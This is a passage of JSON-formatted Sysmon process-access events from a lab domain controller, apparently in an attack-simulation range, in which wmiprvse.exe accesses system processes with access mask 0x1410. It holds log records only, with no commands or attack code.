07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5283,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010D3D50000}\r\nTargetProcessId: 1396\r\nTargetImage: C:\\Windows\\system32\\dwm.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010D3D50000}","TargetProcessId":"1396","TargetImage":"C:\\Windows\\system32\\dwm.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5284,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010A6F30000}\r\nTargetProcessId: 1612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010A6F30000}","TargetProcessId":"1612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5285,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C8050100}\r\nTargetProcessId: 1844\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C8050100}","TargetProcessId":"1844","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5286,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F64-5F25-0000-00102B800100}\r\nTargetProcessId: 2388\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F64-5F25-0000-00102B800100}","TargetProcessId":"2388","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5287,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010B7860200}\r\nTargetProcessId: 2956\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010B7860200}","TargetProcessId":"2956","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5288,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F69-5F25-0000-0010BB890200}\r\nTargetProcessId: 3004\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F69-5F25-0000-0010BB890200}","TargetProcessId":"3004","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5289,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT